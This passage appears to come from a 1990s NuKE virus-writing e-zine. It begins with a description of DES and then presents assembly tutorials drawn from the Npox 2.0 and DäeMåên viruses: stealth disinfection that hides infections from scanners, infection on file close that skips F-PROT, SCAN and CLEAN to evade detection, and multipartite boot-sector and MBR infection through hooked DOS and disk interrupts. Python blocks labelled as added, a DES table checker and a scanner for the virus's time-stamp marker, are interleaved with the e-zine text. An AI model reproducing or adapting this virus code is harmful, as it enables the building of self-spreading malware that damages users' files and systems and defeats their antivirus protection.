predetermined from block to block) and if the 56-bit variable is randomly
chosen, no technique other than that of trying all the possible keys, using
a known input and output for the DES, will guarantee finding the chosen key.
As there are over 70,000,000,000,000,000 (70 quadrillion) possible keys of
56 bits, the feasibility of deriving a particular key in this way is
extremely unlikely in typical "threat" environments. Moreover, if the key
is changed frequently, the risk of this event happening is greatly
diminished. However, users should be aware that it is theoretically
possible to derive the key in fewer trials (with a correspondingly lower
probability of success depending on the number of keys tried), and should
be cautioned to change the key as often as practical. Users must change
the key and must provide it a high level of protection in order to
minimize the potential risks of its unauthorized computation or
acquisition. The feasibility of computing the correct key may change with
advances in technology.
                                                                           
                                                                           
Data Encryption Methods                                                    
~~~~~~~~~~~~~~~~~~~~~~~                                                    
Encryption is the transformation of data from its original intelligible
form to an unintelligible cipher form. Two basic transformations may be
used: permutation and substitution. Permutation changes the order of the
individual symbols comprising the data. In a substitution transformation,
the symbols themselves are replaced by other symbols. During permutation,
the symbols retain their identities but lose their positions. During
substitution, the symbols retain their positions but lose their original
identities.
                                                                           
The set of rules for a particular transformation is expressed in an        
algorithm. Basic transformations may be combined to form a complex         
transformation. In a computer system, the symbols of the data are groups of
one or more binary digits (1s and 0s) called bits. A group of bits is      
called a byte. In computer applications, the encryption transformation of  
permutation reorders the bits of the data. The encryption transformation of
substitution replaces one bit with another or one byte with another.       
                                                                           
                                                                           
Data Encryption Algorithm                                                  
~~~~~~~~~~~~~~~~~~~~~~~~~                                                  
The algorithm is designed to encipher and decipher blocks of data
consisting of 64 bits under control of a 64-bit key. Deciphering must be
accomplished by using the same key that was used for enciphering, but with
the schedule of addressing the key bits altered so that the deciphering
process is the reverse of the enciphering process.

A block to be enciphered is subjected to an initial permutation, IP, and
then to a complex key-dependent computation, and, finally, to a permutation
which is the inverse of the initial permutation. The key-dependent
computation can be defined simply, in terms of a function "F" called the
cipher function, and the function `KS' called the key schedule. A
description of the computation is given first along with the details as to
how the algorithm is used for encipherment. Next the use of the algorithm
for decipherment is described. Finally, a definition of the cipher
function "F" is given in terms of the primitive functions, which are
called selection functions "Si" and the permutation function "P". The
primitive functions Si, P, KS of the algorithm are contained in the
Appendix of FIPS Publication 46.
                                                                           
The following notation is convenient: Given two blocks (L and R) of bits,
LR denotes the block consisting of the bits of L followed by the bits of R.
Since concatenation is associative, B1B2...B8, for example, denotes the
block consisting of the bits of B1 followed by the bits of B2...followed by
the bits of B8.
                                                                           
                                                                           
Enciphering                                                                
~~~~~~~~~~~                                                                
A sketch of the enciphering computation is given below. The following      
information is given more clearly and accurately in FIPS Publications 46   
and 74. It is quoted here for informational purposes only.                 
                                                                           
The 64 bits of the input block to be enciphered are first subjected to the
following permutation, called the initial permutation, IP:
                                                                           
--------- IP -----------   That is, the permuted input has bit
58 50 42 34 26 18 10  2    58 of the input as its first bit, bit
60 52 44 36 28 20 12  4    50 as its second bit, and so on, with
62 54 46 38 30 22 14  6    bit 7 as its last bit. The permuted
64 56 48 40 32 24 16  8    input feeds the complex key-dependent
57 49 41 33 25 17  9  1    computation described below. The
59 51 43 35 27 19 11  3    output of that computation, called the
61 53 45 37 29 21 13  5    preoutput, is then subjected to the
63 55 47 39 31 23 15  7    following permutation, IP-1, which is
------------------------   the inverse of the initial permutation:

-------- IP -1 ---------
40  8 48 16 56 24 64 32    That is, the output of the algorithm
39  7 47 15 55 23 63 31    has bit 40 of the preoutput block as
38  6 46 14 54 22 62 30    its first bit, bit 8 as its second bit
37  5 45 13 53 21 61 29    and so on, until bit 25 of the
36  4 44 12 52 20 60 28    preoutput block is the last bit of the
35  3 43 11 51 19 59 27    output.
34  2 42 10 50 18 58 26
33  1 41  9 49 17 57 25
------------------------
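
How the table notation works in practice, as an added example that is not
part of the original article: IP is applied to a 64-bit block, IP-1 is
derived from IP rather than typed in by hand, and a hand-copied table is
checked for being a true permutation. Function names and the faulty sample
table are constructed for the example.

```python
# Initial permutation IP from FIPS 46: entry j is the input bit that
# becomes output bit j (bits are numbered 1..64, bit 1 leftmost).
IP = [
    58, 50, 42, 34, 26, 18, 10, 2,
    60, 52, 44, 36, 28, 20, 12, 4,
    62, 54, 46, 38, 30, 22, 14, 6,
    64, 56, 48, 40, 32, 24, 16, 8,
    57, 49, 41, 33, 25, 17, 9, 1,
    59, 51, 43, 35, 27, 19, 11, 3,
    61, 53, 45, 37, 29, 21, 13, 5,
    63, 55, 47, 39, 31, 23, 15, 7,
]


def transcription_faults(table):
    """Return (missing, repeated) bit numbers in a copied table."""
    wanted = range(1, len(table) + 1)
    missing = [n for n in wanted if n not in table]
    repeated = sorted({n for n in table if table.count(n) > 1})
    return missing, repeated


def invert(table):
    """Derive the inverse table: if output bit j takes input bit b,
    then the inverse's output bit b takes input bit j."""
    if transcription_faults(table) != ([], []):
        raise ValueError("table is not a permutation, cannot invert")
    inverse = [0] * len(table)
    for out_pos, in_bit in enumerate(table, start=1):
        inverse[in_bit - 1] = out_pos
    return inverse


def permute(block: int, table) -> int:
    """Apply a bit-selection table to an integer block (bit 1 = MSB)."""
    width = len(table)
    out = 0
    for in_bit in table:
        out = (out << 1) | ((block >> (width - in_bit)) & 1)
    return out


def rows(table, per_row=8):
    """Format a table the way the standard prints it."""
    return [" ".join(f"{n:2d}" for n in table[i:i + per_row])
            for i in range(0, len(table), per_row)]


IP_INV = invert(IP)

# Constructed faulty copy: row 2 of IP-1 overwritten with row 3, the kind
# of slip that happens when a table is retyped by hand.
BAD_COPY = IP_INV[:8] + IP_INV[16:24] + IP_INV[16:]

if __name__ == "__main__":
    print("\n".join(rows(IP_INV)))
    block = 0x0123456789ABCDEF
    assert permute(permute(block, IP), IP_INV) == block
    print("faults in bad copy:", transcription_faults(BAD_COPY))
```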
                                                                           
                                                                           
Characteristics of the DES Algorithm                                       
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                       
The DES algorithm is a recirculating, 64-bit, block product cipher whose
security is based on a secret key. DES keys are 64-bit binary vectors
consisting of 56 independent information bits and 8 parity bits. The parity
bits are reserved for error-detection purposes and are not used by the
encryption algorithm. The 56 information bits are used by the enciphering
and deciphering operations and are referred to as the active key. Active
keys are generated (selected at random from all possible keys) by each
group of authorized users of a particular computer system or set of data.
Each user should understand that the key must be protected and that any
compromise of the key will compromise all data and resources protected by
that key. In the encryption computation, the 64-bit data input is divided
into two halves, with each consisting of 32 bits. One half is used as input
to a complex nonlinear function, and the result is Exclusive-OR'ed to the
other half. After one iteration, or round, the two halves of the data are
swapped and the operation is performed again. The DES algorithm uses 16
rounds to produce a recirculating block product cipher. The cipher produced
by the algorithm displays no correlation to the input. Every bit of the
output depends on every bit of the input and on every bit of the active
key. The security provided by the DES algorithm is based on the fact that,
if the key is unknown, an unauthorized recipient of encrypted data, knowing
some of the matching input data, must perform an unacceptable effort to
decipher other encrypted data or recover the key. Even having all but one
bit of the key correct does not result in intelligible data.
                                                                           
The only known way of obtaining the key with certainty is by obtaining
matching ciphertext and plaintext and, then, exhaustively testing the keys
by enciphering the known plaintext with each key and comparing the result
with the known ciphertext. Since 56 independent bits are used in a DES key,
2^56 such tests are required to guarantee finding a particular key. The
expected number of tests needed to recover the correct key is 2^55. At one
microsecond per test, 1142 years would be required. Under certain
conditions (not only knowing matched plaintext and ciphertext but also the
complement of the plaintext and the resulting ciphertext), the expected
effort could be reduced to 571 years. The possibility of 70 quadrillion
keys makes the guessing or computing of any particular key very unlikely,
given that the guidelines for generating and protecting a key provided in
the publication are followed. Of course, one can always reduce the time
required to exhaust any cryptoalgorithm by having several devices working in
parallel; time is reduced but initial expenses are increased.
                                                                           
                        Rock Steady/NuKE                                   
===========================================================================
===========================================================================
                    *************************************                  
                    **  Disinfecting an Infected File  **                  
                    **                                 **                  
                    **       By Rock Steady/NuKE       **                  
                    *************************************                  
                                                                           
The BEST advantage a virus can have is `Disinfecting on the Fly', as we must
try to basically hide the virus as well as possible! And nowadays Anti-
Virus programs are going crazy. As I remember, at the time Npox 2.0 was
developed it would Disinfect every file opened by F-prot and Scan, and
when the Scanner found nothing and closed the file to go on to the next,
Npox would re-infect them. Truly can cause havoc. As a matter of fact,
Frisk didn't like this as I had some `Anti Fuck-Prot' routines and he
added his own routine to open files by Int21h/6C00h, as Npox only
disinfected on Int21h/3Dh. However, to make the virus disinfect on
Int21h/6C00h doesn't require much work: simply take the ASCIIZ
string at DS:SI and put SI into DX so we have DS:DX pointing to it,
then run this routine.
                                                                           
The Basic idea on disinfection is this...
  -For .COM files
     Restore the original first 3 bytes of the program; these
     3 bytes are usually somewhere inside the virus, and then simply
     remove the virus from the end of the .COM file!
     We do this by jumping to the end of the COM file and subtracting
     the Virus size from the File size and that new value is the
     original file size!
     NOTE: if you write a virus whose length changes (Polymorphic)
     it's wise to save the original Filesize to be infected
     beforehand.

  -For .EXE files & Overlays
     This procedure is not different, just that if you changed CS:IP &
     SP:SS in the EXE header, simply restore the original values, or to
     save time, simply save the Original EXE header (first 1b bytes) in
     the virus and write that to the beginning as I did for Npox 2.0
     Then Subtract yourself from the original size and cut it off!
                                                                           
I will now follow thru the Npox 2.0 virus routine Closely so you can
understand this process.
                                                                           
Okay first thing you would want to do is CHECK if this is a valid file!    
If the virus infects COMs & EXEs, do not waste your time looking thru      
other extensions, or for tight code you can waste your time and "HOPE"     
the `infection' marker will fail! Meaning if the virus uses the seconds    
field set to 60 (as Npox) then naturally only INFECTED files will have     
a time stamp of 60! And this routine is not needed...                      
                                                                           
opening_file:   call    check_extension         ;Check for .COM extension  
                jnc     open_fuck2              ;YES; Jmp & Disinfect      
                call    check_exten_exe         ;Check for .EXE extension  
                jnc     open_fuck2              ;YES; Jmp & disinfect      
                jmp     dword ptr cs:[int21]    ;Other wise goto DOS       
                                                                           
; At this point the file has an .COM or .EXE extension, so we continue     
                                                                           
open_fuck2:     push    ax                      ;Save AX                   
                mov     ax,3d02h                ;Ready to open             
                call    calldos21               ;Do it!                    
;NOTE: its important you called Int21h YOURSELF! you CAN NOT do a "Int 21h"
;command, as the virus will intercept it, and will come to this routine    
;and it will continue over and over again, Never ending loop, until the    
;stack gets too big, overwrite the code and the system jams...All done     
;in about 2 seconds...                                                     
                jnc     open_fuck1              ;No Error Continue         
                pop     ax                      ;restore                   
                iret                            ;Exit                      
                                                                           
open_fuck1:     push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                mov     bx,ax                   ;BX=File handler           
                mov     ax,5700h                ;Get file TimeStamp        
                call    calldos21                                          
                                                                           
                mov     al,cl                   ;move seconds into al      
                or      cl,1fh                  ;Left just seconds         
                dec     cx                      ;60 Seconds                
                xor     al,cl                   ;cmp                       
                jnz     opening_exit3           ;NOT 60 seconds exit!      
                                                                           
                dec     cx                                                 
                mov     word ptr cs:[old_time],cx  ;Save time Stamp        
                mov     word ptr cs:[old_date],dx  ;Save Date Stamp        
                                                                           
                mov     ax,4202h                ;Goto the End of File      
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                                                                           
                mov     cx,dx                   ;Save the filesize         
                mov     dx,ax                   ;we will need it later     
                                                ;to subtract the virus     
                push    cx                      ;size fromit...            
                push    dx                      ;Save it...                
                                                                           
Here now we get the first 3 bytes (for com) or first 1B bytes (EXE header).
In the Nuke Pox virus I save the ORIGINAL first 3 bytes of the .com at
the VERY END! Since the buffer I made was 1B hex bytes, it is able to
hold the EXE header or 3 .com bytes, anyhow the beginning of these
bytes are the last 1B bytes, since it's at the end... figure it out where
you saved your 3 bytes or exe header for your virus, or use the Npox
routine...
                                                                           
                sub     dx,1Bh                  ;Subtract 1B bytes from    
                sbb     cx,0                    ;the filesize!             
                mov     ax,4200h                ;Now our pointer will      
                call    calldos21               ;point to the 1B bytes     
                                                ;Where the COM & EXE       
                                                ;original bytes are        
                push    cs                                                 
                pop     ds                      ;CS=DS (for exes)          
                                                                           
                mov     ah,3fh                  ;Read them into Buffer     
                mov     cx,1Bh                  ;1B bytes                  
                mov     dx,offset buffer        ;to our buffer             
                call    calldos21                                          
                                                                           
humm, now we got the original bytes, all we gotta do is write them         
back to the file's beginning...                                            
                                                                           
                xor     cx,cx                   ;Goto Beginning of File    
                xor     dx,dx                   ;                          
                mov     ax,4200h                                           
                call    calldos21                                          
                                                                           
                mov     ah,40h                  ;Write first three bytes   
                mov     dx,offset buffer        ;our buffer                
                mov     cx,1Bh                  ;1B bytes for EXEs         
                cmp     word ptr cs:[buffer],5A4Dh                         
                je      open_exe_jmp            ;if EXE file jump          
                mov     cx,3h                   ;if COM write only 3 bytes 
open_exe_jmp:   call    calldos21                                          
                                                                           
We wrote the original file's data back to place, now we need to cut the    
virus off from the file, the virus is written at the end of the file,      
so all we do is set our file-pointer to EOF - Virus_Size, which gives      
us the original file length!                                               
                                                                           
                pop     dx                      ;EOF - Virus_Size          
                pop     cx                      ;to get ORIGINAL File size 
                sub     dx,virus_size           ;subtract virus size       
                sbb     cx,0                                               
                mov     ax,4200h                                           
                call    calldos21                                          
                                                                           
Now this is perhaps the "TRICKIEST" part, in order to "CROP" the file at
our new ptr location, what we do is use DOS to crop it: by writing 0
bytes to the new location, DOS will make that new location the NEW
EoF and as a result cut off the virus and delete its sectors in the
FAT.
                                                                           
                mov     ah,40h                  ;Write new EOF             
                xor     cx,cx                   ;Zero Bytes                
                call    calldos21               ;doit                      
                                                                           
                mov     cx,word ptr cs:[old_time]     ;Restore file time   
                mov     dx,word ptr cs:[old_date]     ;Restore file date   
                mov     ax,5701h                                           
                int     21h                                                
                                                                           
                mov     ah,3eh                  ;Close File                
                call    calldos21                                          
                                                                           
opening_exit3:  pop     ds                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                jmp     dword ptr cs:[int21]     ;Return to DOS...         
                                                                           
ahh, the file is now Disinfected, now we safely return it to DOS and DOS   
may now open the file for inspection...                                    
                                                                           
                                Rock Steady/NuKE                           
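
From the scanning side, the two artifacts this article describes (a time
stamp whose seconds field reads 60, and a saved header in the last 1Bh
bytes of the file) can be checked without going through a hooked Int 21h,
by reading directory entries and file bytes from a disk image or a clean
boot. This is an added example, not part of the original article or of any
scanner named in it; the function names, the standard 32-byte FAT directory
entry layout it assumes, and the sample directory are constructed here.

```python
import struct

MARKER_FIELD = 30         # 5-bit seconds/2 field; 30 decodes to "60 seconds"
SAVED_HEADER_LEN = 0x1B   # bytes the article says are kept at the very end


def pack_time(hour: int, minute: int, field: int) -> int:
    """Build a DOS time word: hhhhh mmmmmm sssss (sssss = seconds / 2)."""
    return (hour << 11) | (minute << 5) | field


def classify_time(time_word: int) -> str:
    """A real clock only ever yields seconds/2 values 0..29."""
    field = time_word & 0x1F
    if field == MARKER_FIELD:
        return "marker-60s"          # the value the article tests for
    if field > 29:
        return "invalid-seconds"     # 31 decodes to "62 seconds"
    return "ok"


def scan_directory(raw: bytes):
    """Walk raw 32-byte FAT directory entries, flag .COM/.EXE files whose
    last-write time cannot have come from a real clock."""
    findings = []
    for off in range(0, len(raw) - 31, 32):
        entry = raw[off:off + 32]
        if entry[0] == 0x00:         # end of directory
            break
        if entry[0] == 0xE5:         # deleted entry
            continue
        if entry[11] & 0x18:         # volume label or subdirectory
            continue
        name = entry[0:8].decode("ascii", "replace").rstrip()
        ext = entry[8:11].decode("ascii", "replace").rstrip()
        time_word, _date_word = struct.unpack_from("<HH", entry, 22)
        verdict = classify_time(time_word)
        if ext in ("COM", "EXE") and verdict != "ok":
            findings.append((f"{name}.{ext}", verdict))
    return findings


def has_saved_mz_trailer(data: bytes) -> bool:
    """Heuristic only: an EXE whose final 1Bh bytes also begin with 'MZ',
    as a saved copy of the original header would. Use it to corroborate a
    time stamp hit, not as a verdict on its own."""
    return (len(data) >= 2 * SAVED_HEADER_LEN
            and data[:2] == b"MZ"
            and data[-SAVED_HEADER_LEN:][:2] == b"MZ")


def _entry(name: str, ext: str, time_word: int, attr: int = 0x20) -> bytes:
    """Constructed directory entry (date 0x1A6D = 13 March 1993)."""
    return struct.pack("<8s3sB10sHHHI", name.ljust(8).encode(),
                       ext.ljust(3).encode(), attr, bytes(10),
                       time_word, 0x1A6D, 2, 4096)


# Constructed sample directory, not taken from a real disk.
SAMPLE_DIR = b"".join([
    _entry("COMMAND", "COM", pack_time(12, 0, 0)),
    _entry("GAME", "EXE", pack_time(10, 15, 30)),
    b"\xE5" + _entry("OLD", "EXE", pack_time(9, 0, 30))[1:],
    _entry("NOTES", "TXT", pack_time(8, 30, 30)),
    _entry("TOOL", "COM", pack_time(23, 59, 31)),
    bytes(32),
])

if __name__ == "__main__":
    for name, verdict in scan_directory(SAMPLE_DIR):
        print(f"{name:12s} {verdict}")
```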
===========================================================================
===========================================================================
                        ****************************                       
                        **  Infection on Closing  **                       
                        **                        **                       
                        **  By Rock Steady/NuKE   **                       
                        ****************************                       
This routine goes out for a few people that had trouble hacking this
routine themselves... I kinda like it, it's my very OWN, no Dark Avenger
hack, it is VERY straight forward, and kinda simple...I was not going
to put this here, but since I `Promised' people and left them hanging
with `Wait for IJ#5, I guess I owed you it... huh?'

Again this code comes right out of Npox 2.0, it's neat, simple, fast,
cool, and it works, Npox is your example, I heard MANY MANY complaints
with other `Virus writing guides' Meaning they explained the code but
sometimes the author himself never checked if the code was good, as he
may have modified it, and not tested it... or whatever reason... Anyhow
                                                                           
------------------                                                         
Okay once you intercepted the Int21h/ah=3Dh function you make it jump      
here...                                                                    
                                                                           
closing_file:   cmp     bx,0h                   ;Handle=0?                 
                je      closing_bye             ;if equal leave            
                cmp     bx,4h                   ;Handle > 4                
                ja      close_cont              ;if YES ,then JUMP!        
closing_bye:    jmp     dword ptr cs:[int21]    ;Leave, no interest to us  
                                                                           
The whole point of the above code is that DOS contains 5 predefined
Handles, 0 -> 4, Basically, those handles are the NULL, CON, AUX
COMx, LPTx handles... So we surely do not need to continue once we
encounter that...
                                                                           
close_cont:     push    ax                                                 
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    di                                                 
                push    ds                                                 
                push    es                                                 
                push    bp                                                 
                                                                           
Our biggest problem is how do we know if this file is a .COM or .EXE or
simply just another dumb data file? We need this info before we can
try to infect it... We do this by getting DOS's "List of Lists", this
will give us all the INFO needed on the File Handle Number we have in BX!
and we do that like so...
                                                                           
                push    bx                      ;Save File Handle          
                mov     ax,1220h                ;Get the Job File Table    
                int     2fh                     ;(JFT)                     
                                                                           
This will give us the JFT for the CURRENT File handle in BX, which         
is given thru ES:DI Then we use this information to get the Address of     
the System File Table!                                                     
                                                                           
                mov     ax,1216h        ;Get System File Table (List)      
                mov     bl,es:[di]      ;system file table entry number    
                int     2fh                                                
                pop     bx              ;restore the Handle                
                                                                           
                add     di,0011h                                           
                mov     byte ptr es:[di-0fh],02h                           
                                                                           
                add     di,0017h                ;Jump to the ASCIIZ string 
                cmp     word ptr es:[di],'OC'   ;Is it a .COM file?        
                jne     closing_next_try        ;Next cmp...               
                cmp     byte ptr es:[di+2h],'M'                            
                jne     pre_exit                ;Nope exit                 
                jmp     closing_cunt3           ;.COM file continue        
                                                                           
closing_next_try:                                                          
                cmp     word ptr es:[di],'XE'   ;Is it a .EXE file?        
                jne     pre_exit                ;No, exit                  
                cmp     byte ptr es:[di+2h],'E'                            
                jne     pre_exit                ;No, exit                  
                                                                           
If it is an .EXE file, check if it is F-PROT or SCAN, see F-PROT when      
started up, Opens itself, closes itself, etc... So that a dumb             
virus will infect it, and then the CRC value changes and F-PROT            
screams... haha... Fuck-Prot! is the name...                               
                                                                           
closing_cunt:   cmp     word ptr es:[di-8],'CS'                            
                jnz     closing_cunt1              ;SCAN                   
                cmp     word ptr es:[di-6],'NA'                            
                jz      pre_exit                                           
                                                                           
closing_cunt1:  cmp     word ptr es:[di-8],'-F'                            
                jnz     closing_cunt2              ;F-PROT                 
                cmp     word ptr es:[di-6],'RP'                            
                jz      pre_exit                                           
                                                                           
closing_cunt2:  cmp     word ptr es:[di-8],'LC'                            
                jnz     closing_cunt3                                      
                cmp     word ptr es:[di-6],'AE'    ;CLEAN                  
                jnz     closing_cunt3                                      
                                                                           
pre_exit:       jmp     closing_nogood                                     
                                                                           
The REST is pretty much EXACTLY the same as `how' you'd infect a normal
file; I'll leave it for you to go thru it... The hardest part is
OVER! The only tricky part is the ending... Remember to close the file
and then do an IRET; you don't leave control to DOS, as you only needed
to close it, so do it... OR DON'T close it and return to DOS, as DOS
will close it; just DON'T CLOSE IT TWICE!!!!
                                                                           
closing_cunt3:  mov     ax,5700h                        ;Get file Time     
                call    calldos21                                          
                mov     al,cl                                              
                or      cl,1fh                                             
                dec     cx                              ;60 Seconds        
                xor     al,cl                                              
                jz      closing_nogood                  ;Already infected  
                                                                           
                push    cs                                                 
                pop     ds                                                 
                mov     word ptr ds:[old_time],cx       ;Save time         
                mov     word ptr ds:[old_date],dx                          
                                                                           
                mov     ax,4200h                        ;jmp beginning of  
                xor     cx,cx                           ;file...           
                xor     dx,dx                                              
                call    calldos21                                          
                                                                           
                mov     ah,3fh                          ;Get first 1b byte 
                mov     cx,1Bh                                             
                mov     dx,offset buffer                                   
                call    calldos21                                          
                                                                           
                jc      closing_no_good                 ;error?            
                mov     ax,4202h                        ;Jmp to the EOF    
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                                                                           
                jc      closing_no_good                                    
                cmp     word ptr ds:[buffer],5A4Dh      ;.EXE file?        
                je      closing_exe                     ;Yupe then jmp     
                mov     cx,ax                                              
                sub     cx,3h                                              
                mov     word ptr ds:[jump_address+1],cx  ;Figure out the   
                call    infect_me                        ;jmp for .com     
                                                                           
                jc      closing_no_good                                    
                mov     ah,40h                          ;Write it to file  
                mov     dx,offset jump_address                             
                mov     cx,3h                                              
                call    calldos21                                          
closing_no_good:                                                           
                mov     cx,word ptr ds:[old_time]       ;Save file time    
                mov     dx,word ptr ds:[old_date]       ;& date            
                mov     ax,5701h                                           
                call    calldos21                                          
                                                                           
closing_nogood: pop     bp                                                 
                pop     es                                                 
                pop     ds                                                 
                pop     di                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                jmp     dword ptr cs:[int21]                               
                                                                           
As you can see above, we DIDN'T close the file, so we leave DOS to do it.
The code below is for infecting .EXEs...
                                                                           
closing_exe:    mov     cx,word ptr cs:[buffer+20]      ;Save the original 
                mov     word ptr cs:[exe_ip],cx         ;CS:IP & SS:SP     
                mov     cx,word ptr cs:[buffer+22]                         
                mov     word ptr cs:[exe_cs],cx                            
                mov     cx,word ptr cs:[buffer+16]                         
                mov     word ptr cs:[exe_sp],cx                            
                mov     cx,word ptr cs:[buffer+14]                         
                mov     word ptr cs:[exe_ss],cx                            
                                                                           
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                mov     word ptr cs:[vir_cs],dx                            
                push    ax                                                 
                push    dx                                                 
                call    infect_me                                          
                pop     dx                                                 
                pop     ax                                                 
                mov     word ptr cs:[buffer+22],dx                         
                mov     word ptr cs:[buffer+20],ax                         
                pop     dx                                                 
                pop     ax                                                 
                jc      closing_no_good                                    
                                                                           
                add     ax,virus_size                                      
                adc     dx,0                                               
                                                                           
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                add     ax,40h                                             
                mov     word ptr cs:[buffer+14],dx                         
                mov     word ptr cs:[buffer+16],ax                         
                pop     dx                                                 
                pop     ax                                                 
                                                                           
                push    bx                                                 
                push    cx                                                 
                mov     cl,7                                               
                shl     dx,cl                                              
                                                                           
                mov     bx,ax                                              
                mov     cl,9                                               
                shr     bx,cl                                              
                                                                           
                add     dx,bx                                              
                and     ax,1FFh                                            
                jz      close_split                                        
                inc     dx                                                 
close_split:    pop     cx                                                 
                pop     bx                                                 
                                                                           
                mov     word ptr cs:[buffer+2],ax                          
                mov     word ptr cs:[buffer+4],dx                          
                                                                           
                mov     ah,40h                                             
                mov     dx,offset ds:[buffer]                              
                mov     cx,20h                                             
                call    calldos21                                          
                                                                           
closing_over:   jmp     closing_no_good                                    
                                                                           
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                   Infection Routine...                                   
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
infect_me       proc                                                       
                mov     ah,40h                                             
                mov     dx,offset init_virus                               
                mov     cx,virus_size                                      
                call    calldos21                                          
                                                                           
                jc      exit_error                      ;Error Split       
                mov     ax,4200h                                           
                xor     cx,cx                           ;Pointer back to   
                xor     dx,dx                           ;Top of file!      
                call    calldos21                                          
                                                                           
                jc      exit_error                      ;Split Dude...     
                clc                                     ;Clear carry flag  
                ret                                                        
exit_error:                                                                
                stc                                     ;Set carry flag    
                ret                                                        
infect_me       endp                                                       
===========================================================================
===========================================================================
Multipartite Infection                                                     
~~~~~~~~~~~~~~~~~~~~~~                                                     
                                                                           
OK, you've seen them floating around... these whiz-bang you-bewt mongrel   
viruses which never seem to go away, even after you disinfect every file   
in existence... Huh... How the fuck did that come back?! Well it's really  
quite simple, and I'm sure not all of you out there are complete idiots.   
The fact is that the virus isn't even in any files! ...It's hiding in      
the partition table, or the boot sector!                                   
                                                                           
There are only a few viruses out there with the capability for             
multipartite infection, or "boot/file virus". Tequila, Anthrax and         
Invader are a few examples. My own creation, DäeMåên, is another, going    
a step further than any other boot/file virus has ever gone before, by     
infecting almost everything possible.                                      
                                                                           
The principle is VERY simple, in fact I kicked myself when I worked out    
a way to do it. The idea is simple, and it's the very same principle       
employed in any other TSR method... to hook interrupt 21h (DOS). This is   
fine. BUT the only hitch is that DOS automatically overwrites the old      
vector when it loads! So there's no point hooking it as soon as your       
code loads up off the disk. So what can we do?                             
                                                                           
We will obviously have to wait for DOS to change the interrupt, so we
can hook it. But there's one problem! Other stupid programmers were
being selfish and changed the i21 pointer as a marker so that they can
tell if it's been changed... like Invader puts a -1 in the IP value of
int 21h... so if something like DäeMåên is also on the system, it thinks
it's DOS changing the pointer, hooks it and crashes the entire system...
                                                                           
The way I waited for the pointer to change was to hook interrupt 13        
TWICE! (huh?) Pretty simple. What I did was have my int-check routine      
hooked onto i13 first, then my i13 handler over the top. The reason why    
you can't have it the other way is that in case another "program" hooks    
i13 over the top, and you can't disable your int-check routine... so       
it'll keep re-hooking and fuck up the system. (You could do it with        
flags, but I try and use as few flags as possible to keep code size down   
to a minimum).                                                             
                                                                           
At boot-up, the program checks to see if it's already TSR (via an          
illegal call to some interrupt, and checking the return code) and if it    
isn't, it steals some memory (something F-Prot and friends can pick up,    
but who gives a fuck, plus I can get around that now...<hehe>), hooks      
int 13h with the int-check routine, hooks it again with our i13 handler,   
then saves the current interrupt 21h vector.  On every disk call, it
compares the value of i21 with the saved value... if it's different, the
int-check routine hooks it and then changes the vector that our int 13h
handler calls, so it no longer calls our int-check routine but goes        
straight to the real i13.                                                  
                                                                           
That's the essentials of boot/file management. Anyhow, here's the code     
to do what I just said, as it appears in the source code of DäeMåên...     
                                                                           
new13_2:        ; the guts of multipartite infection                       
                ; check to see if i21 has changed... if so, hook it        
                call save                       ; save registers           
                push cs                                                    
                pop es                                                     
                xor ax, ax                                                 
                mov ds, ax                                                 
                mov si, 21h*4                                              
                mov di, offset oldvect+8                                   
                cld                                                        
                cmpsw                                                      
                je nochange                                                
                cmpsw                                                      
                je nochange                                                
                call capture_21                                            
                push cs                                                    
                pop ds                                                     
                mov si, offset oldvect+0        ; copy over other ptr so   
                lea di, [si+4]                  ; that our i13 doesn't call
                movsw                           ; here any more [i21 has   
                movsw                           ; been hooked]             
nochange:       call restore                    ; restore registers        
                jmp dword ptr cs:[oldvect+0]                               
                                                                           
                                                                           
This method can be used on either floppy boot sector infection or the HD   
partition table infection.                                                 
                                                                           
As with many of my routines, stuff which took many other virus writers a   
few pages of code took me one page... that's not bad! I have many other    
goodies up my sleeve, like a 387-byte generic COM/EXE parasitic infector   
on execution, the smallest of its kind in the WORLD... (with room for      
improvement!).                                                             
                                                                           
Anyway, next InfoJournal will include the source codes to two of my        
prerelease Mutation Engines, both of which are fully functional in their   
own right. They have evolved far beyond my dreams, and I hope to have      
the world's best mutation engine finished by the end of February/March.    
(but it can't be the best at everything, but it sure generates a bucket    
fuckload of arcane bullshit instructions.  Heuristical nightmare...)       
                                                                           
Anyway, have fun screwing around with this little piece of research        
material...                                                                
                                                                           
                        TäLöN/NuKE                                         
===========================================================================
===========================================================================
DäeMåên Virus                                                              
~~~~~~~~~~~~~                                                              
                                                                           
This virus took me a while to write (about two weeks), because I was       
writing a lot of it for the first time. Some of the code is a bit          
overboard, like I don't think the SYS entry has to be quite that complex   
in order to work... but never mind. At least it works and it's quite       
well-behaved.                                                              
                                                                           
This virus is my first boot/file virus, and that also works perfectly.     
I worked all my own routines from scratch (my virus collection is          
extremely small, and I don't want to be influenced by other                
implementations unless they're better).                                    
                                                                           
It infects both floppy boot sectors, moving the original boot sector to    
the 5th last sector of the disk and writing the virus code on the last     
four. It also infects the Master Boot Record (partition table) on the      
first physical hard disk. Booting off an infected floppy will infect       
the MBR, as will the execution of an infected file. However, trying to     
read the partition table results in the redirection of the call,           
resulting in the original partition table (prior to infection) being       
read/written.                                                              
                                                                           
Floppies are infected on read/write access, and won't be infected if the   
drive is still spinning (ie. no disk change). It will take the boot        
sector and use the BPB to calculate the last sectors of the disk, no       
matter what format, be it 160k, 1.44meg, or even a 20meg floptical disk.   
It makes sure it's a valid BPB by checking the OEM name to see if it's     
valid alphanumeric characters, but I was a bit selfish in that I overwrite 
the last word of OEM to mark infection.                                    
                                                                           
